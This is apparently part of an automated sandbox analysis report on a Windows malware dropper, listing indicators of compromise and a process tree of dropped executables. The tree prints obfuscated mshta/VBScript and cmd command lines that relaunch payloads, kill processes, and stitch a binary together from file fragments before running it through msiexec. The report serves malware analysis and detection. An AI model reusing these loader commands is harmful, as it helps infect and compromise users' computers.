2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe 2224 CoEA_w0kyWG2WXlI_NmzGIeB.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
foldershare.exepid Process 3240 3700 foldershare.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
tGPLfmakviwwx8D8QKxJELZ_.exeD93A.exepid Process 3844 tGPLfmakviwwx8D8QKxJELZ_.exe 1872 D93A.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
Processes:
msedge.exepid Process 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe 5848 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
svchost.exesvchost.exe7qn4oO9BoLqPcXPnJsizWxHM.exeW4ysop1FHYRr_xdZXf7ZCJ_e.exeWerFault.exen4B2euMVLh0bciK4wmLM5Ln_.exedescription pid Process Token: SeShutdownPrivilege 1808 svchost.exe Token: SeCreatePagefilePrivilege 1808 svchost.exe Token: SeShutdownPrivilege 1808 svchost.exe Token: SeCreatePagefilePrivilege 1808 svchost.exe Token: SeShutdownPrivilege 1808 svchost.exe Token: SeCreatePagefilePrivilege 1808 svchost.exe Token: SeShutdownPrivilege 2068 svchost.exe Token: SeCreatePagefilePrivilege 2068 svchost.exe Token: SeCreateTokenPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeAssignPrimaryTokenPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeLockMemoryPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeIncreaseQuotaPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeMachineAccountPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeTcbPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeSecurityPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeTakeOwnershipPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeLoadDriverPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeSystemProfilePrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeSystemtimePrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeProfSingleProcessPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeIncBasePriorityPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeCreatePagefilePrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeCreatePermanentPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeBackupPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeRestorePrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeShutdownPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeDebugPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeAuditPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeSystemEnvironmentPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeChangeNotifyPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeRemoteShutdownPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeUndockPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeSyncAgentPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeEnableDelegationPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeManageVolumePrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeImpersonatePrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeCreateGlobalPrivilege 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: 31 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: 32 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: 33 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: 34 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: 35 1416 7qn4oO9BoLqPcXPnJsizWxHM.exe Token: SeDebugPrivilege 4940 W4ysop1FHYRr_xdZXf7ZCJ_e.exe Token: SeRestorePrivilege 2736 WerFault.exe Token: SeBackupPrivilege 2736 WerFault.exe Token: SeBackupPrivilege 2736 WerFault.exe Token: SeDebugPrivilege 4804 n4B2euMVLh0bciK4wmLM5Ln_.exe Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 Token: SeCreatePagefilePrivilege 3240 Token: SeShutdownPrivilege 3240 -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exeinstaller.exeCalculator.exepid Process 5848 msedge.exe 2596 installer.exe 7152 Calculator.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
svchost.exeFri051e1e7444.exedescription pid Process procid_target PID 2068 wrote to memory of 1528 2068 svchost.exe 83 PID 2068 wrote to memory of 1528 2068 svchost.exe 83 PID 2860 wrote to memory of 2224 2860 Fri051e1e7444.exe 85 PID 2860 wrote to memory of 2224 2860 Fri051e1e7444.exe 85 PID 2860 wrote to memory of 4424 2860 Fri051e1e7444.exe 86 PID 2860 wrote to memory of 4424 2860 Fri051e1e7444.exe 86 PID 2860 wrote to memory of 4424 2860 Fri051e1e7444.exe 86 PID 2860 wrote to memory of 2196 2860 Fri051e1e7444.exe 88 PID 2860 wrote to memory of 2196 2860 Fri051e1e7444.exe 88 PID 2860 wrote to memory of 2196 2860 Fri051e1e7444.exe 88 PID 2860 wrote to memory of 1500 2860 Fri051e1e7444.exe 87 PID 2860 wrote to memory of 1500 2860 Fri051e1e7444.exe 87 PID 2860 wrote to memory of 1500 2860 Fri051e1e7444.exe 87 PID 2860 wrote to memory of 1048 2860 Fri051e1e7444.exe 90 PID 2860 wrote to memory of 1048 2860 Fri051e1e7444.exe 90 PID 2860 wrote to memory of 1544 2860 Fri051e1e7444.exe 89 PID 2860 wrote to memory of 1544 2860 Fri051e1e7444.exe 89 PID 2860 wrote to memory of 1544 2860 Fri051e1e7444.exe 89 PID 2860 wrote to memory of 2112 2860 Fri051e1e7444.exe 97 PID 2860 wrote to memory of 2112 2860 Fri051e1e7444.exe 97 PID 2860 wrote to memory of 2112 2860 Fri051e1e7444.exe 97 PID 2860 wrote to memory of 1416 2860 Fri051e1e7444.exe 96 PID 2860 wrote to memory of 1416 2860 Fri051e1e7444.exe 96 PID 2860 wrote to memory of 1416 2860 Fri051e1e7444.exe 96 PID 2860 wrote to memory of 4940 2860 Fri051e1e7444.exe 93 PID 2860 wrote to memory of 4940 2860 Fri051e1e7444.exe 93 PID 2860 wrote to memory of 4940 2860 Fri051e1e7444.exe 93 PID 2860 wrote to memory of 2800 2860 Fri051e1e7444.exe 94 PID 2860 wrote to memory of 2800 2860 Fri051e1e7444.exe 94 PID 2860 wrote to memory of 2800 2860 Fri051e1e7444.exe 94 PID 2860 wrote to memory of 4388 2860 Fri051e1e7444.exe 91 PID 2860 wrote to memory of 4388 2860 Fri051e1e7444.exe 91 PID 2860 wrote to memory of 4388 2860 Fri051e1e7444.exe 91 PID 2860 wrote to memory of 4788 2860 Fri051e1e7444.exe 92 PID 2860 wrote to memory of 4788 2860 Fri051e1e7444.exe 92 PID 2860 wrote to memory of 4788 2860 Fri051e1e7444.exe 92 PID 2860 wrote to memory of 1668 2860 Fri051e1e7444.exe 98 PID 2860 wrote to memory of 1668 2860 Fri051e1e7444.exe 98 PID 2860 wrote to memory of 1668 2860 Fri051e1e7444.exe 98 PID 2860 wrote to memory of 5040 2860 Fri051e1e7444.exe 99 PID 2860 wrote to memory of 5040 2860 Fri051e1e7444.exe 99 PID 2860 wrote to memory of 5040 2860 Fri051e1e7444.exe 99 PID 2860 wrote to memory of 5100 2860 Fri051e1e7444.exe 102 PID 2860 wrote to memory of 5100 2860 Fri051e1e7444.exe 102 PID 2860 wrote to memory of 5100 2860 Fri051e1e7444.exe 102 PID 2860 wrote to memory of 4384 2860 Fri051e1e7444.exe 101 PID 2860 wrote to memory of 4384 2860 Fri051e1e7444.exe 101 PID 2860 wrote to memory of 4384 2860 Fri051e1e7444.exe 101 PID 2860 wrote to memory of 448 2860 Fri051e1e7444.exe 104 PID 2860 wrote to memory of 448 2860 Fri051e1e7444.exe 104 PID 2860 wrote to memory of 2444 2860 Fri051e1e7444.exe 105 PID 2860 wrote to memory of 2444 2860 Fri051e1e7444.exe 105 PID 2860 wrote to memory of 2444 2860 Fri051e1e7444.exe 105 PID 2860 wrote to memory of 1548 2860 Fri051e1e7444.exe 106 PID 2860 wrote to memory of 1548 2860 Fri051e1e7444.exe 106 PID 2860 wrote to memory of 1548 2860 Fri051e1e7444.exe 106 PID 2860 wrote to memory of 4800 2860 Fri051e1e7444.exe 107 PID 2860 wrote to memory of 4800 2860 Fri051e1e7444.exe 107 PID 2860 wrote to memory of 4800 2860 Fri051e1e7444.exe 107 PID 2860 wrote to memory of 2608 2860 Fri051e1e7444.exe 109 PID 2860 wrote to memory of 2608 2860 Fri051e1e7444.exe 109 PID 2860 wrote to memory of 2608 2860 Fri051e1e7444.exe 109 PID 2860 wrote to memory of 3352 2860 Fri051e1e7444.exe 110 PID 2860 wrote to memory of 3352 2860 Fri051e1e7444.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"C:\Users\Admin\Pictures\Adobe Films\CoEA_w0kyWG2WXlI_NmzGIeB.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2224
-
-
C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"C:\Users\Admin\Pictures\Adobe Films\6U5d9bdqsMb6CVYEgAtCoc7k.exe"2⤵
- Executes dropped EXE
PID:4424
-
-
C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"C:\Users\Admin\Pictures\Adobe Films\QLESn8qIBxPtJtPRbSsyAENo.exe"2⤵
- Executes dropped EXE
PID:1500 -
C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"C:\Users\Admin\Documents\wfTqKDpMOg0gUSDI4WZ8cFpx.exe"3⤵
- Executes dropped EXE
PID:3804 -
C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"C:\Users\Admin\Pictures\Adobe Films\mx4lGdzRmaOHuNV50QSkuYOw.exe"4⤵
- Executes dropped EXE
PID:3040
-
-
C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"C:\Users\Admin\Pictures\Adobe Films\fnK4zd6skiJ7xVbd0NQxDWHw.exe"4⤵
- Executes dropped EXE
PID:5412 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 17285⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5548
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"C:\Users\Admin\Pictures\Adobe Films\ecofo8a9dM9rKhtzF6DUe5WS.exe"4⤵
- Executes dropped EXE
PID:480
-
-
C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe"C:\Users\Admin\Pictures\Adobe Films\DQSpoAhLIdEaLNFmPL1y_5AQ.exe" /mixtwo4⤵
- Executes dropped EXE
PID:3696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 2605⤵
- Program crash
PID:2104
-
-
-
C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"C:\Users\Admin\Pictures\Adobe Films\YsPBMke_f_nLTfrT7402u0TT.exe"4⤵
- Executes dropped EXE
PID:3480 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 2525⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5176
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"C:\Users\Admin\Pictures\Adobe Films\lyDzuY17TkHEDB9thlwY6UXK.exe"4⤵
- Executes dropped EXE
PID:3432
-
-
C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"4⤵
- Executes dropped EXE
PID:4036 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵PID:6112
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\0avwqQL9G3rPBLd3vS74Ps8l.exe" ) do taskkill -f -iM "%~NxM"6⤵PID:2020
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
- Executes dropped EXE
PID:4812 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:3156
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:4688
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵PID:5644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵PID:5396
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵PID:788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵PID:4456
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Loads dropped DLL
PID:5036
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "0avwqQL9G3rPBLd3vS74Ps8l.exe"7⤵
- Kills process with taskkill
PID:5880
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"4⤵
- Executes dropped EXE
PID:6040 -
C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp"C:\Users\Admin\AppData\Local\Temp\is-6TSP9.tmp\On307XjhofH5hpn3XhRr0UJT.tmp" /SL5="$2029C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\On307XjhofH5hpn3XhRr0UJT.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-95FI4.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:5916 -
C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe"C:\Program Files\Reference Assemblies\JQIFIOEXVY\foldershare.exe" /VERYSILENT7⤵PID:5428
-
-
C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"C:\Users\Admin\AppData\Local\Temp\ba-7ddc2-0ef-cec9c-f5c75d27c13e0\Duxaqabaequ.exe"7⤵PID:2160
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e68⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:5848 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a547189⤵PID:2268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:29⤵PID:4072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:39⤵PID:1012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:89⤵PID:5992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:19⤵PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:19⤵PID:5268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:19⤵PID:5792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:19⤵PID:6784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:19⤵PID:6340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4868 /prefetch:89⤵PID:6276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:19⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:19⤵PID:6392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:89⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6124 /prefetch:89⤵PID:5804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5364 /prefetch:29⤵PID:2396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6056 /prefetch:19⤵PID:1964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:19⤵PID:6616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:19⤵PID:5648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6424 /prefetch:19⤵
- Loads dropped DLL
- Modifies registry class
PID:1164
-
-
